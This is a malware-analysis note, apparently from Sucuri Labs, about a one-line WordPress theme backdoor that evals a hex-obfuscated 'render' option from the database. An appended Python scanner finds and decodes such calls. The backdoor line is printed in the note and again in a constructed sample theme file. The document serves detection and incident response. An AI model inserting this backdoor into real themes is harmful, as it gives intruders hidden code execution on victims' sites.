Minimalistic WordPress injection

Labs Note

WordPress-specific malware is slightly different from generic PHP malware. Inside WordPress files it can use the WordPress API and the WordPress database, which makes injections like this one possible:

<?php eval(get_option("\x72\x65\x6e\x64\x65\x72")); ?>

It was found in WordPress theme files. The code passes to eval the value of the “render” option (the name is hex-obfuscated in the source and decodes to “render”) from the WordPress wp_options table, which it reads using the get_option WordPress API function.

This piece of code can be used both as a backdoor (say, to execute arbitrary code passed in a certain request parameter) and to inject client-side malware (it was found right after the tag in theme files). We actually found the “render” option in the database, but by the time we began working on the site that option had already been cleaned, so at this point we can't tell what exactly was there. If you find this malware and the original value of the render option on your site, please let us know at labs@sucuri.net.
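The pattern above is easy to miss with a plain grep because the option name is written as hex escapes. The following scanner is an added example (it is not Sucuri's code and not part of the original note): it finds eval(get_option("...")) in PHP source, decodes the PHP string escapes the way the PHP engine would, and reports the real option name and line number, so a responder knows which wp_options row to pull from the database. The theme fragment it scans is constructed for the example; the function names are the example's own.

```python
import os
import re
import sys
from typing import Dict, List

# eval(get_option("...")) or eval(get_option('...')), whitespace-tolerant.
# Group 1 is the quote character, group 2 the raw (still escaped) option name.
EVAL_GET_OPTION = re.compile(
    r"""eval\s*\(\s*get_option\s*\(\s*(['"])((?:\\.|(?!\1).)*)\1""",
    re.DOTALL,
)

_SIMPLE_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "v": "\v", "f": "\f",
                   "\\": "\\", "$": "$", '"': '"'}


def decode_php_string(raw: str, quote: str) -> str:
    """Decode a PHP string literal's escapes (\\xHH, octal, \\n ...) as PHP does."""
    if quote == "'":
        # Single-quoted PHP strings only unescape \\ and \'
        return raw.replace("\\\\", "\\").replace("\\'", "'")
    out: List[str] = []
    i = 0
    while i < len(raw):
        ch = raw[i]
        if ch != "\\" or i + 1 >= len(raw):
            out.append(ch)
            i += 1
            continue
        nxt = raw[i + 1]
        if nxt == "x":
            m = re.match(r"[0-9A-Fa-f]{1,2}", raw[i + 2:])
            if m:  # \xHH hex escape, as used by the sample "\x72\x65..."
                out.append(chr(int(m.group(0), 16)))
                i += 2 + len(m.group(0))
                continue
        if nxt in "01234567":  # \NNN octal escape, also accepted by PHP
            m = re.match(r"[0-7]{1,3}", raw[i + 1:])
            out.append(chr(int(m.group(0), 8) & 0xFF))
            i += 1 + len(m.group(0))
            continue
        if nxt in _SIMPLE_ESCAPES:
            out.append(_SIMPLE_ESCAPES[nxt])
            i += 2
            continue
        # Unknown escape: PHP keeps the backslash literally
        out.append(ch)
        i += 1
    return "".join(out)


def find_eval_get_option(source: str) -> List[Dict[str, object]]:
    """Return one finding per eval(get_option(...)) call in a PHP source string."""
    findings = []
    for m in EVAL_GET_OPTION.finditer(source):
        line_no = source.count("\n", 0, m.start()) + 1
        findings.append({
            "line": line_no,
            "raw": m.group(2),
            "option": decode_php_string(m.group(2), m.group(1)),
        })
    return findings


def scan_tree(root: str) -> Dict[str, List[Dict[str, object]]]:
    """Walk a directory (e.g. wp-content/themes) and collect findings per PHP file."""
    results = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_eval_get_option(fh.read())
            if hits:
                results[path] = hits
    return results


# Constructed sample theme header carrying the injection; not a real theme file.
SAMPLE_HEADER_PHP = r'''<?php
/* constructed sample header.php for the example */
?>
<!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head>
<?php wp_head(); ?>
</head>
<?php eval(get_option("\x72\x65\x6e\x64\x65\x72")); ?>
<body <?php body_class(); ?>>
'''

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    report = scan_tree(target) if target else {"<sample>": find_eval_get_option(SAMPLE_HEADER_PHP)}
    for path, hits in report.items():
        for h in hits:
            print(f"{path}:{h['line']}: eval(get_option({h['raw']!r})) -> option {h['option']!r}")
```

Run it with a theme directory as the argument to scan real files, or with no argument to see it decode the constructed sample. Once the decoded option name is known, the matching wp_options row is the next thing to preserve (before cleaning) and inspect, since that is where the actual payload lives.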
